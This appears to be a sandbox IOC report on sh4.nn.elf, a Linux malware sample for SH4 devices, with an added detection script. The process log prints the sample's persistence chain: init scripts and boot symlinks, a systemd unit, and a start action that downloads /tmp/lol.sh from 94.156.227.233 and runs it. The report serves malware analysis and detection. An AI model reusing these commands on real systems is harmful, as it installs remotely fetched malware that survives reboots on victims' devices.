IOC Report
sh4.nn.elf

Files

File Path | Type | Category | Malicious
sh4.nn.elf | ELF 32-bit LSB executable, Renesas SH, version 1 (SYSV), statically linked, stripped | initial sample | malicious
/etc/init.d/sh4.nn.elf | POSIX shell script, ASCII text executable | dropped | malicious
/etc/init.d/system | POSIX shell script, ASCII text executable | dropped | malicious
/etc/profile | ASCII text | dropped | malicious
/etc/rc.local | POSIX shell script, ASCII text executable | dropped | malicious
/boot/bootcmd | ASCII text | dropped | -
/etc/inittab | ASCII text | dropped | -
/etc/motd | ASCII text | dropped | -
/etc/systemd/system/custom.service | ASCII text | dropped | -
/memfd:snapd-env-generator (deleted) | ASCII text | dropped | -
/tmp/qemu-open.LF9svx (deleted) | data | dropped | -

A "-" in the Malicious column means the sandbox did not flag the file. All dropped entries other than the sample itself are boot-time or login-time files (init.d scripts, rc.local, profile, inittab, bootcmd, motd, a systemd unit), i.e. the sample's persistence footprint.

Processes

Path | Cmdline
/tmp/sh4.nn.elf | /tmp/sh4.nn.elf
/tmp/sh4.nn.elf | -
/bin/sh | sh -c "systemctl enable custom.service >/dev/null 2>&1"
/bin/sh | -
/usr/bin/systemctl | systemctl enable custom.service
/tmp/sh4.nn.elf | -
/bin/sh | sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
/bin/sh | -
/usr/bin/chmod | chmod +x /etc/init.d/system
/tmp/sh4.nn.elf | -
/bin/sh | sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
/bin/sh | -
/usr/bin/ln | ln -s /etc/init.d/system /etc/rcS.d/S99system
/tmp/sh4.nn.elf | -
/bin/sh | sh -c "echo \"#!/bin/sh\n# /etc/init.d/sh4.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting sh4.nn.elf'\n /tmp/sh4.nn.elf &\n wget http://94.156.227.233/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping sh4.nn.elf'\n killall sh4.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/sh4.nn.elf"
/tmp/sh4.nn.elf | -
/bin/sh | sh -c "chmod +x /etc/init.d/sh4.nn.elf >/dev/null 2>&1"
/bin/sh | -
/usr/bin/chmod | chmod +x /etc/init.d/sh4.nn.elf
/tmp/sh4.nn.elf | -
/bin/sh | sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
/bin/sh | -
/usr/bin/mkdir | mkdir -p /etc/rc.d
/tmp/sh4.nn.elf | -
/bin/sh | sh -c "ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf >/dev/null 2>&1"
/bin/sh | -
/usr/bin/ln | ln -s /etc/init.d/sh4.nn.elf /etc/rc.d/S99sh4.nn.elf
/tmp/sh4.nn.elf | -
/tmp/sh4.nn.elf | -
/tmp/sh4.nn.elf | -
/tmp/sh4.nn.elf | -
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/lib/systemd/systemd | -
/usr/lib/systemd/system-environment-generators/snapd-env-generator | /usr/lib/systemd/system-environment-generators/snapd-env-generator
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/libexec/gnome-session-binary | -
/bin/sh | /bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
/usr/libexec/gsd-housekeeping | /usr/libexec/gsd-housekeeping
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
/usr/lib/udisks2/udisksd | -
/usr/sbin/dumpe2fs | dumpe2fs -h /dev/dm-0
36 further processes are omitted from this export.

A "-" in the Cmdline column means no command line was captured; the Malicious column of the original report is empty for every process. The udisks2/dumpe2fs, systemd/snapd-env-generator and GNOME session entries are standard daemons of the analysis VM, and the report shows no command line tying them to the sample. The sample's own activity is the chain of sh -c calls above: it writes /etc/init.d/sh4.nn.elf (a start/stop script whose start action relaunches /tmp/sh4.nn.elf and fetches http://94.156.227.233/ into /tmp/lol.sh, then runs it), marks that script and /etc/init.d/system executable, links both into the boot sequence as /etc/rcS.d/S99system and /etc/rc.d/S99sh4.nn.elf (creating /etc/rc.d if it is missing), and enables custom.service through systemctl. Every command's output is redirected to /dev/null, so nothing is printed on the console of an infected device.

URLs

Name | IP
http://94.156.227.233/curl.sh | unknown
http://94.156.227.233/lol.sh | unknown
http://94.156.227.233/oro1vk | unknown
http://94.156.227.233/ | unknown

The Malicious column of the original report is empty for every URL. All four URLs share the single download host 94.156.227.233, which the dropped init script also contacts at boot.
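The Processes table above records the persistence chain and the URLs table the download host. The script below is an added example, not part of the sandbox report or of the sample, that sweeps a root filesystem for exactly those artifacts; it can be pointed at "/" on a suspect host or at the mount point of an extracted firmware image. The paths, file names and the 94.156.227.233 host are taken from this report. The check for units whose ExecStart runs a binary out of /tmp is an added heuristic, because the report does not show what custom.service contains; the fixture directory used in the usage note is constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the sandbox report): sweep a root filesystem for the
# persistence artifacts this report attributes to sh4.nn.elf. ROOT is "/" for
# a live host or the mount point of an extracted firmware image.

# Download host and payload names seen in the report (dots escaped for grep -E).
IOC_REGEX='94\.156\.227\.233|sh4\.nn\.elf|/tmp/lol\.sh|curl\.sh|oro1vk|custom\.service'

# Files and symlinks the sample created; their mere presence is a finding.
DROPPED_PATHS='/tmp/sh4.nn.elf
/etc/init.d/sh4.nn.elf
/etc/init.d/system
/etc/rcS.d/S99system
/etc/rc.d/S99sh4.nn.elf
/etc/systemd/system/custom.service'

# Boot-time files the sample modified. These exist on clean systems too, so
# they are a finding only when they reference one of the IOC strings.
MODIFIED_PATHS='/etc/profile
/etc/rc.local
/etc/inittab
/boot/bootcmd
/etc/motd'

# sweep_root ROOT: print one "<reason><TAB><path>" line per finding.
sweep_root() {
    root="${1%/}"   # strip a trailing slash so "$root$path" joins cleanly

    printf '%s\n' "$DROPPED_PATHS" | while IFS= read -r p; do
        # Test -L as well as -e: an absolute symlink such as
        # /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elf dangles when the
        # image is mounted under a prefix, and -e alone would miss it.
        if [ -e "$root$p" ] || [ -L "$root$p" ]; then
            printf 'dropped-artifact\t%s\n' "$root$p"
        fi
    done

    printf '%s\n' "$MODIFIED_PATHS" | while IFS= read -r p; do
        f="$root$p"
        if [ -f "$f" ] && grep -Eq "$IOC_REGEX" "$f"; then
            printf 'modified-bootfile\t%s\n' "$f"
        fi
    done

    # Heuristic (an assumption, not from the report): any unit that starts a
    # binary out of /tmp, whatever the unit happens to be called.
    for u in "$root"/etc/systemd/system/*.service; do
        if [ -f "$u" ] && grep -Eq '^ExecStart=.*/tmp/' "$u"; then
            printf 'unit-exec-from-tmp\t%s\n' "$u"
        fi
    done
}

# count_findings ROOT: number of findings, for use in scripts and exit codes.
count_findings() {
    sweep_root "$1" | grep -c .
}

if [ "$#" -gt 0 ]; then
    sweep_root "$1"
fi
```

Run it as `sh sweep.sh /mnt/image` (the file name is assumed). When an image is mounted under a prefix, absolute symlinks like /etc/rc.d/S99sh4.nn.elf -> /etc/init.d/sh4.nn.elf resolve against the analyst's own host rather than the image and therefore look dangling; that is why the script tests -L as well as -e, since otherwise the rc.d hooks would be missed. On a live host the same command, run as root, also covers /tmp/sh4.nn.elf, which a filesystem image of the flash partitions would not contain.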

IPs

IP | Country
136.177.253.115 | United States
173.5.14.197 | United States
194.150.233.243 | Ukraine
212.234.148.47 | France
211.33.113.230 | Korea, Republic of
29.194.158.5 | United States
65.237.227.59 | United States
100.252.93.167 | United States
48.52.4.224 | United States
113.198.127.147 | Korea, Republic of
155.26.246.10 | United States
62.211.135.191 | Italy
174.42.86.145 | United States
146.188.103.42 | United Kingdom
169.190.116.15 | United States
201.75.122.208 | Brazil
161.69.210.48 | United States
208.193.8.68 | United States
67.253.209.186 | United States
14.175.57.246 | Vietnam
60.208.36.80 | China
136.45.199.195 | United States
223.92.145.71 | China
179.137.87.125 | Brazil
34.45.225.142 | United States
106.111.43.16 | China
29.136.86.138 | United States
220.63.147.183 | Japan
92.181.179.254 | France
213.193.245.162 | Netherlands
146.150.51.102 | United States
207.85.152.113 | United States
99.175.88.217 | United States
95.5.137.106 | Turkey
27.74.115.166 | Vietnam
25.154.143.40 | United Kingdom
175.164.168.151 | China
95.102.171.247 | Slovakia
44.18.204.240 | United States
36.202.219.225 | China
150.111.252.48 | United States
200.72.107.21 | Chile
22.187.21.236 | United States
203.219.236.81 | Australia
42.104.114.80 | India
183.216.166.231 | China
102.11.69.63 | unknown
58.118.130.196 | China
58.198.40.215 | China
5.47.248.138 | Turkey
103.219.38.247 | China
87.109.14.74 | Saudi Arabia
99.130.99.24 | United States
125.47.104.5 | China
143.238.53.4 | Australia
143.149.38.158 | United States
147.70.139.247 | United States
215.245.84.1 | United States
145.184.234.30 | Netherlands
184.166.236.56 | United States
184.216.64.64 | United States
213.77.164.108 | Poland
58.69.247.34 | Philippines
78.7.68.246 | Italy
136.132.101.140 | United States
151.86.239.88 | Italy
131.141.78.162 | Canada
122.144.121.32 | Philippines
142.28.111.82 | Canada
69.43.233.20 | United States
3.243.200.233 | United States
72.249.240.252 | United States
88.18.240.62 | Spain
143.236.53.244 | United States
112.222.70.198 | Korea, Republic of
21.103.141.215 | United States
68.0.183.116 | United States
135.25.25.113 | United States
1.200.90.243 | Taiwan
53.5.58.198 | Germany
37.161.8.40 | France
223.40.235.76 | Korea, Republic of
2.199.111.147 | Italy
102.177.96.43 | Kenya
123.67.190.45 | China
171.67.12.67 | United States
76.86.113.215 | United States
210.60.66.201 | Taiwan
31.106.212.216 | United Kingdom
85.166.186.24 | Norway
131.126.123.3 | United States
98.14.0.225 | United States
210.251.189.196 | Japan
15.19.103.199 | United States
95.55.230.222 | Russian Federation
12.34.131.123 | United States
141.161.183.77 | United States
128.116.190.137 | Italy
118.29.175.133 | China
197.83.5.124 | South Africa
90 further IPs are omitted from this export.

The Domain column of the original report reads "unknown" for every entry and the Malicious column is empty for all of them.

Memdumps

Base Address | Protect | Malicious
7f5cf8417000 | page execute read | malicious
7f5d7e6f0000 | page read and write | -
7ffd3ea85000 | page read and write | -
55f97ecfc000 | page read and write | -
55f97eae6000 | page execute read | -
55f97ed04000 | page read and write | -
7f5d7e461000 | page read and write | -
7f5d78000000 | page read and write | -
55f980d19000 | page read and write | -
7f5cf8428000 | page read and write | -
7f5d7ef4b000 | page read and write | -
7f5d7eab2000 | page read and write | -
7f5d7ee22000 | page read and write | -
7f5d7ef53000 | page read and write | -
7f5d7ead7000 | page read and write | -
7f5d78021000 | page read and write | -
55f982292000 | page read and write | -
7ffd3eb2b000 | page execute read | -
7f5d7ef98000 | page read and write | -
7f5d7dc50000 | page read and write | -
7f5cf842d000 | page read and write | -
7f5d7e453000 | page read and write | -
55f980d02000 | page execute and read and write | -
13 further memdumps are omitted from this export.

The Regiontype column of the original report is empty for every dump, and "-" in the Malicious column means the dump was not flagged. Note that these are 64-bit user-space addresses, which a 32-bit SH4 binary cannot have; together with the /tmp/qemu-open.LF9svx temporary file in the Files table, this indicates the dumps were taken from the host-side emulator process (QEMU user mode) that ran sh4.nn.elf. They are therefore not offsets into the SH4 ELF itself, and only the one region flagged malicious is worth carving for strings or signatures from the sample.